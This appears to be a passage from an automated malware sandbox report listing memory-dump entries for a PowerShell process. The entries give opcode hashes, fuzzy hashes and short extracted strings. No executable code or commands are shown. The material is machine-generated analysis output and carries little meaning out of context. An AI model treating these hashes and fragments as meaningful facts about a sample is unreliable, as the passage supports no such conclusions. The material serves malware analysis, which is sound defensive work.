                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e161a855efa2208231932164ae9866393e0a08488548ab285394b7359ab065c0
                                                        • Instruction ID: 6ee7036d02ec3f75fd25b30edb3504837db9734e341d1cffd4f892134bb6f59d
                                                        • Opcode Fuzzy Hash: e161a855efa2208231932164ae9866393e0a08488548ab285394b7359ab065c0
                                                        • Instruction Fuzzy Hash: 70F05831E092489FC751DFA8D8442ACBBF0EF49214F2482EBE85897341D7304A16DB40
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1e33e7df895945ac86b40c89c9ecc1cca549fa2ddb1213b2807548fee79b0476
                                                        • Instruction ID: b49e34fbdd4a4367ecc619ad99a27d3de8f5e56b0f166c34ad363274e55f3ab8
                                                        • Opcode Fuzzy Hash: 1e33e7df895945ac86b40c89c9ecc1cca549fa2ddb1213b2807548fee79b0476
                                                        • Instruction Fuzzy Hash: 75E06D31D592489FC711DFA4E4452DCBFF8AB0A211F1401EAD84493252D7304A44CBA1
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2213590170.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_72e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4eb6cadeefd84bc93a003008d2bf24ec53db8d4a76854b6807cef0e012ed8816
                                                        • Instruction ID: b6fa50fd725a3c554a41c6573b90227ec81e01103b4e63911a0a6274d03797a3
                                                        • Opcode Fuzzy Hash: 4eb6cadeefd84bc93a003008d2bf24ec53db8d4a76854b6807cef0e012ed8816
                                                        • Instruction Fuzzy Hash: 5FF052B4E10208EFCB40DFA8C485AACBBF8EB88300F50C0AA9818A3341D2359E02DB40
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e8d76904fa6daf41c040463a94cb5d83aa612a3f187aed689912626cb6045e32
                                                        • Instruction ID: 01aff509d544ca2b2e178131d71c7a3186bfbd71c293728aa8c9e6d9e99380f1
                                                        • Opcode Fuzzy Hash: e8d76904fa6daf41c040463a94cb5d83aa612a3f187aed689912626cb6045e32
                                                        • Instruction Fuzzy Hash: 74F0D435904208EFCF41DFA8D941A9DBBB5FF48304F14C09AED1893210D7329A61EF80
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3aab78112b114c0e2480c086168422b262bb93caa810c1330b46eafb46f8c6a9
                                                        • Instruction ID: 0b99c10c710e48cccd8e1e5ea8012cee0e1c48b5a22eb988639e6e41d6249e6b
                                                        • Opcode Fuzzy Hash: 3aab78112b114c0e2480c086168422b262bb93caa810c1330b46eafb46f8c6a9
                                                        • Instruction Fuzzy Hash: 39F01570E05208EFC744EFA8D5446ACBBF4FB49211F2081AEC80893341D7319A52DF40
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2213590170.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_72e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 975666a8794be9f208ffcf0f15a79988fb97609f28309b8c1d9168392160d1d2
                                                        • Instruction ID: 347f0f7e7dc3c2893cc9f1d8481a413c2b2464f65f8e5b7f74bee950057bfa3a
                                                        • Opcode Fuzzy Hash: 975666a8794be9f208ffcf0f15a79988fb97609f28309b8c1d9168392160d1d2
                                                        • Instruction Fuzzy Hash: 27F0ED708082C8AFC705DFA0E8509ADBFB8EB1A310F1880EAD84417352D2319E52D740
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1f58734b3e701484d662f52a3b7ede5ce5eb297e26ce736c4936fa7ac328adb0
                                                        • Instruction ID: 206c444214cd0ae5ef883dbbc56e24aace78445ec55006edb54389e12b3ac2eb
                                                        • Opcode Fuzzy Hash: 1f58734b3e701484d662f52a3b7ede5ce5eb297e26ce736c4936fa7ac328adb0
                                                        • Instruction Fuzzy Hash: 28F01575E04208EFCB44DFA8D4446ACBBF4EB49315F2080AEC84897300D7319E42DB40
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2213590170.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_72e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5930bd993ea5a8cb460fbd0e0e5324ac00e61eee46420737eb720b519596c167
                                                        • Instruction ID: 74b4c74396f387f5b859cd7aac22c0119155c47cf29e0311b5e8d63f07a22414
                                                        • Opcode Fuzzy Hash: 5930bd993ea5a8cb460fbd0e0e5324ac00e61eee46420737eb720b519596c167
                                                        • Instruction Fuzzy Hash: 46E022B4908208EFC714CF90C884AADBBB8EB96310F60D0A9CC4023380C632AD52D750
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2f8bef529670d5522ef65750de0c274a35262d70db0f945e2ddc4fef0b67aca6
                                                        • Instruction ID: 6ca98d1f6f6ad00fe2b7148479f8e1b4d86194f7bc71bc50344c5b25e0106817
                                                        • Opcode Fuzzy Hash: 2f8bef529670d5522ef65750de0c274a35262d70db0f945e2ddc4fef0b67aca6
                                                        • Instruction Fuzzy Hash: AAE09275808208EBC700DF94D88AAEDBFB8FB48315F2081ADDC4413341E7319D56DB50
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2216878613.0000000008060000.00000040.00000800.00020000.00000000.sdmp, Offset: 08060000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8060000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aa26eace0b276d5ab7ddffc85fa65f5676c4836af6598e67b703246c58420077
                                                        • Instruction ID: fa461544df7914149f6ce87cdcbfc28a23e26a7b26199782d4ce50b1e4701e47
                                                        • Opcode Fuzzy Hash: aa26eace0b276d5ab7ddffc85fa65f5676c4836af6598e67b703246c58420077
                                                        • Instruction Fuzzy Hash: 7DF0F234D04208AFCB80DFA8C540A9CBBF5EF48211F10C0AA9819A3340D635AA61DB40
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0a8b1410bbdaa0dbebea72a438c08a7fe1071ab3c0569e86472677c8c501e1c9
                                                        • Instruction ID: b173017b42c81425a1247a999870a87ecacdccd03b367834e899b24796cf6cb0
                                                        • Opcode Fuzzy Hash: 0a8b1410bbdaa0dbebea72a438c08a7fe1071ab3c0569e86472677c8c501e1c9
                                                        • Instruction Fuzzy Hash: D8F0AE35904208EFCB04EF98D941AACBBB5EB49310F2081AAAC1857351D7329A62EB80
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2216878613.0000000008060000.00000040.00000800.00020000.00000000.sdmp, Offset: 08060000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8060000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4b8fe856fd58e2b799c78b62564b5d61c50f7a5fab449d490a4e6b36773c75ca
                                                        • Instruction ID: db4c44aaafacdfaf012a09b84f85b54acce948e2a7c191f95731c44edc780259
                                                        • Opcode Fuzzy Hash: 4b8fe856fd58e2b799c78b62564b5d61c50f7a5fab449d490a4e6b36773c75ca
                                                        • Instruction Fuzzy Hash: 7EE0E574E04208EFCB84DFA8D5446ACBBF5EB48311F10C5AA882897340EB319A52CF80
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2213590170.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_72e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 805911448692507ffa0a7555256d1948066861a7ae528e4afdb71a3d516f1b10
                                                        • Instruction ID: 5f6ec5ea7f0f9dccadc792d4822a13cd0631e32bd1b03edb944520fb24d6cfa6
                                                        • Opcode Fuzzy Hash: 805911448692507ffa0a7555256d1948066861a7ae528e4afdb71a3d516f1b10
                                                        • Instruction Fuzzy Hash: ACE06D709141049BCB14DFA4D0856E9BF76EB95314F2486A9C80427302C7329D5BCB40
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9ed7e0abb22f8ea2a94517c2d3db7860b142646b5927aa622f7f7e2779a4aed9
                                                        • Instruction ID: a62f955673db18b598ec7b97080ee9054d3ddb5e8939c19a232963026116817d
                                                        • Opcode Fuzzy Hash: 9ed7e0abb22f8ea2a94517c2d3db7860b142646b5927aa622f7f7e2779a4aed9
                                                        • Instruction Fuzzy Hash: 43E0C274E04208EFCB44DFA8D5446ACBBF4EB49204F2081AA885997340D7319E42CB40
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9ed7e0abb22f8ea2a94517c2d3db7860b142646b5927aa622f7f7e2779a4aed9
                                                        • Instruction ID: 3c71e7bf15af94e1f6a9f0cd0efaab7c97ef05a4b5ba34119438f470771e2915
                                                        • Opcode Fuzzy Hash: 9ed7e0abb22f8ea2a94517c2d3db7860b142646b5927aa622f7f7e2779a4aed9
                                                        • Instruction Fuzzy Hash: 4BE07D74D04208EFCB44DFA9D5456ACFBF8EB48214F20C5E9985893341D735AA56DF41
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9ed7e0abb22f8ea2a94517c2d3db7860b142646b5927aa622f7f7e2779a4aed9
                                                        • Instruction ID: 44595c0b272bc8becfa8044e86836c532bc83cf0c7cc10bc2c660882eb61d2d8
                                                        • Opcode Fuzzy Hash: 9ed7e0abb22f8ea2a94517c2d3db7860b142646b5927aa622f7f7e2779a4aed9
                                                        • Instruction Fuzzy Hash: 1CE0E574E04208EFCB84EFA8D5456ADBBF4EB48204F20C5EA981893340DB319A52CF40
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9ed7e0abb22f8ea2a94517c2d3db7860b142646b5927aa622f7f7e2779a4aed9
                                                        • Instruction ID: 1473fd34d5569fb211e87c526946354ff43ce27391a28d1a15e0780052e320a6
                                                        • Opcode Fuzzy Hash: 9ed7e0abb22f8ea2a94517c2d3db7860b142646b5927aa622f7f7e2779a4aed9
                                                        • Instruction Fuzzy Hash: DDE0E574E05208EFCB44DFA9D5446ADBBF4FB49304F20C1EA881893340D7319A52CF40
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 77109db7cc62825bba6ac9e9021715fd7ba36cc2d818f9f8087e7e3d6febb5f6
                                                        • Instruction ID: 5fe0ac8464e2da7eb8a2284aa99faa3b3de1db38679ffb3fd28862fb1494437c
                                                        • Opcode Fuzzy Hash: 77109db7cc62825bba6ac9e9021715fd7ba36cc2d818f9f8087e7e3d6febb5f6
                                                        • Instruction Fuzzy Hash: 34E0E574D08248AFCB84DFA9D9446ACBBF4FB49204F2080EA9858A3341E7359E51DF40
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2216878613.0000000008060000.00000040.00000800.00020000.00000000.sdmp, Offset: 08060000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8060000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 442555c34fae03cf583ec42163d3d1e1598e4b8e643b85f5f2a11beab6419b15
                                                        • Instruction ID: 0259a1e3f300697d703d1dac6e8372e5b4e46bbfefc3a25bcd8da14fcfbc06c7
                                                        • Opcode Fuzzy Hash: 442555c34fae03cf583ec42163d3d1e1598e4b8e643b85f5f2a11beab6419b15
                                                        • Instruction Fuzzy Hash: 90E0B674904248EFDB84EFA8D9856ACBBF9EB48215F2085A9980893741E731AE56CB41
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2213590170.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_72e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9c883e5ab48d004fef8ee22ecd1f89b95106bfdf46c9bee2a71e8c630b31ddf4
                                                        • Instruction ID: 16607a2b90383fba03bd2af31ed9dff930d63bffc15296536f6ffe8515df8dfd
                                                        • Opcode Fuzzy Hash: 9c883e5ab48d004fef8ee22ecd1f89b95106bfdf46c9bee2a71e8c630b31ddf4
                                                        • Instruction Fuzzy Hash: 1EE08674914248EBC704DF94D5449ADBBBCEB59310F14819DDC0817340D7319E52DB80
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 76eb7968512af9c68aecff3058523df18792774b8da3cc87b169ac88ef01e76b
                                                        • Instruction ID: ce11ce9fb2865141db26ee249658ddc9d015f2b5e50cc58b3969cfa7dbb77958
                                                        • Opcode Fuzzy Hash: 76eb7968512af9c68aecff3058523df18792774b8da3cc87b169ac88ef01e76b
                                                        • Instruction Fuzzy Hash: 96E08C34908208EBCB04DF94D946AACBFB8EB49319F2081ADDC0463340DB329E92DB81
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2213590170.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_72e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 526f4f61f79522e09278a235c7bfabb09fcb3da31367107c3f2a2e6cf8535cc2
                                                        • Instruction ID: a9b96e9df014a5373c99af8e177e7a7f0212882476b6e6dffc97a842460ffee3
                                                        • Opcode Fuzzy Hash: 526f4f61f79522e09278a235c7bfabb09fcb3da31367107c3f2a2e6cf8535cc2
                                                        • Instruction Fuzzy Hash: D4E0C274D18208DBC704EF94D5405ACBBBDEB85300F24C1ADCC0813341DB319E56CB80
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a3f8f1d362112a5b837b73def228d4a5d8adcfdf3e43f6e25a9264a15ed638b4
                                                        • Instruction ID: dab21bf603130d5ee0a59dffc93c7bc588a9f67795f89318d3819b366f927b74
                                                        • Opcode Fuzzy Hash: a3f8f1d362112a5b837b73def228d4a5d8adcfdf3e43f6e25a9264a15ed638b4
                                                        • Instruction Fuzzy Hash: 39E0EC70D55248DFC744EFA8E54969CBBF8EB08201F2005E9C80893251EB305A54DB51
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2213590170.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_72e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 2$`o$$t2$x^$$$q
                                                        • API String ID: 0-1616347337
                                                        • Opcode ID: c43e7db766a536ea6fdc82b731cce83d83991dca8da01cd2bb19e4db67f1129f
                                                        • Instruction ID: 6d49060a40590d685f1f1e4176e97ec3f9459f3acb1b9c5e4ee44afa0b46dd1d
                                                        • Opcode Fuzzy Hash: c43e7db766a536ea6fdc82b731cce83d83991dca8da01cd2bb19e4db67f1129f
                                                        • Instruction Fuzzy Hash: 1AE2B1B4E106298FDB64DF68D88479ABBF6FB89301F5081E9D409AB354DB349E85CF40
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: B$F$Teq
                                                        • API String ID: 0-2187489633
                                                        • Opcode ID: 192e784c8f6b17cca57f717dce01481a6c2b82357e5bddeadaea13627aacfeec
                                                        • Instruction ID: 67158485ad58a3c0e14c6ae6d1b7346382d10e47db7c9b26034f4b12b0e5e5a7
                                                        • Opcode Fuzzy Hash: 192e784c8f6b17cca57f717dce01481a6c2b82357e5bddeadaea13627aacfeec
                                                        • Instruction Fuzzy Hash: 7231C9B1D016588BEB58CFABC8447DDFBF3AF89300F14D0AAD459AA658DB744A85CF40
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: B$F$Teq
                                                        • API String ID: 0-2187489633
                                                        • Opcode ID: 2458e77f03734afdfb8db2ec3141287b0d16edf3bf6c8c0746b450e597319c51
                                                        • Instruction ID: d8ebc8d6978b082a877d213f2b98ddcd7b464f6bab617e684112f98ee460d860
                                                        • Opcode Fuzzy Hash: 2458e77f03734afdfb8db2ec3141287b0d16edf3bf6c8c0746b450e597319c51
                                                        • Instruction Fuzzy Hash: 1D31C7B1D016588BEB18CFABC8447DDBBF7AF89300F14D0A9D459AA258DB744A858F40
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2210157777.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_6bf0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'q$4'q
                                                        • API String ID: 0-1467158625
                                                        • Opcode ID: 44f131abb7d94904fdeb0d880ec4f7597204e693febb81bea5c809b24d7eb9d3
                                                        • Instruction ID: 3df435e57b77a74827b57ef3ad5fbfdb7e187fac27e6bac9876ccea6877db58c
                                                        • Opcode Fuzzy Hash: 44f131abb7d94904fdeb0d880ec4f7597204e693febb81bea5c809b24d7eb9d3
                                                        • Instruction Fuzzy Hash: 1271FC71D102498FD708DFAAE5417AEBBF3FB88301F14C569E0049B265EF74581A8B91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2216878613.0000000008060000.00000040.00000800.00020000.00000000.sdmp, Offset: 08060000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8060000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: =$>
                                                        • API String ID: 0-3816510428
                                                        • Opcode ID: 993dc31f5a3046e8e9b14480302433318201be004a8cbbc59ec8740b5ddb0994
                                                        • Instruction ID: 32b7b5bc60ed6fe5dd6e548bc5d1bc0dbdbb31f25d8b23394cf0e70b5b370cc6
                                                        • Opcode Fuzzy Hash: 993dc31f5a3046e8e9b14480302433318201be004a8cbbc59ec8740b5ddb0994
                                                        • Instruction Fuzzy Hash: D621B5B1E047588BEB18CFABCC0419EFBF7BFC9311F14C16A8419AB659EB7049568E00
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ;PG3
                                                        • API String ID: 0-1782200024
                                                        • Opcode ID: 18c1166f52dba44c3ce4012dead85413603e148d63b8badecfdb72baee20af1a
                                                        • Instruction ID: a7135bed197e77995ec8fb31b76b8ab5c4f40b29bd2853025a9b57876e514f3a
                                                        • Opcode Fuzzy Hash: 18c1166f52dba44c3ce4012dead85413603e148d63b8badecfdb72baee20af1a
                                                        • Instruction Fuzzy Hash: D712A371E046198FDB14DFAAC98069DFBF2BF88304F24C569D458AB219D734A946CF90
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2216878613.0000000008060000.00000040.00000800.00020000.00000000.sdmp, Offset: 08060000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8060000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Teq
                                                        • API String ID: 0-1098410595
                                                        • Opcode ID: d3db6e96dcc49b3d91ad16b0e0637c24ff36b41313be066dd86ef98efa73596e
                                                        • Instruction ID: 40ba91a6ca7a15d24686b1bc8059ea2b28d00cdf0d7c75f9c056c6e3a25f63b1
                                                        • Opcode Fuzzy Hash: d3db6e96dcc49b3d91ad16b0e0637c24ff36b41313be066dd86ef98efa73596e
                                                        • Instruction Fuzzy Hash: E8A13670E05219CFDB54CFAAD880B9DBBF2BF89311F208069E809AB255DB759D95CF40
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: xy$
                                                        • API String ID: 0-2399629526
                                                        • Opcode ID: b1f29b2c3e437305af38704f68d1a239b93580394fd4c6b66dfae97b29f68591
                                                        • Instruction ID: c6e4f8f46ed312ddef816ef9cb66a540626909ebc017c942fae776401c597f7b
                                                        • Opcode Fuzzy Hash: b1f29b2c3e437305af38704f68d1a239b93580394fd4c6b66dfae97b29f68591
                                                        • Instruction Fuzzy Hash: 8BA1D274A0120DCFDB54CFA8D485BAEBBF1EB49705F2080AAE409E7690DB745E85CF91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: xy$
                                                        • API String ID: 0-2399629526
                                                        • Opcode ID: 9dd1d6ef70daa7a22444cec0829799a0f582c24e62ffc3dd82233fa56ae35f72
                                                        • Instruction ID: 0a0c8044b73b6146e4a9edcaef32dd8f7957c358e54ca54bf02239b1e1b34e1d
                                                        • Opcode Fuzzy Hash: 9dd1d6ef70daa7a22444cec0829799a0f582c24e62ffc3dd82233fa56ae35f72
                                                        • Instruction Fuzzy Hash: 44911374A0520DCFDB14CFA8D485BEEBBF1EB49705F2080AAE409E7690DB745A85CF91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: xy$
                                                        • API String ID: 0-2399629526
                                                        • Opcode ID: 7ae7da4cfb69d6145ae3ad251ed320243101f32246695e97ca5b73fb0c0e4be0
                                                        • Instruction ID: d00dd12804f5273c32265754d2c3ab5493224aacf6a2552834efdd586a9a659b
                                                        • Opcode Fuzzy Hash: 7ae7da4cfb69d6145ae3ad251ed320243101f32246695e97ca5b73fb0c0e4be0
                                                        • Instruction Fuzzy Hash: 6681F474A0120DCFDB54CFA8D485BEEBBF1EB09715F2080AAE409E7690DB745A85CF91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: xy$
                                                        • API String ID: 0-2399629526
                                                        • Opcode ID: 7702077819b742b1177b84e32f16abfe5fb3f0a4fb152906b766956952029803
                                                        • Instruction ID: 067a538dedaae76ad7eb08563cf133bdece1e149ccb9b280386cbd1096772a0d
                                                        • Opcode Fuzzy Hash: 7702077819b742b1177b84e32f16abfe5fb3f0a4fb152906b766956952029803
                                                        • Instruction Fuzzy Hash: 4781F274A0520DCFDB54CFA8D485BEEBBF1EB09715F2080AAE409E7690DB745A84CF91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: xy$
                                                        • API String ID: 0-2399629526
                                                        • Opcode ID: 09578c0b53eb599693acecc039195c40ba7f3da26be91a6225a9699635afe692
                                                        • Instruction ID: 442abf268d0b715ef1a1585b3ff0f234ccaa72b9c52e3d1a339b68152a60f8ee
                                                        • Opcode Fuzzy Hash: 09578c0b53eb599693acecc039195c40ba7f3da26be91a6225a9699635afe692
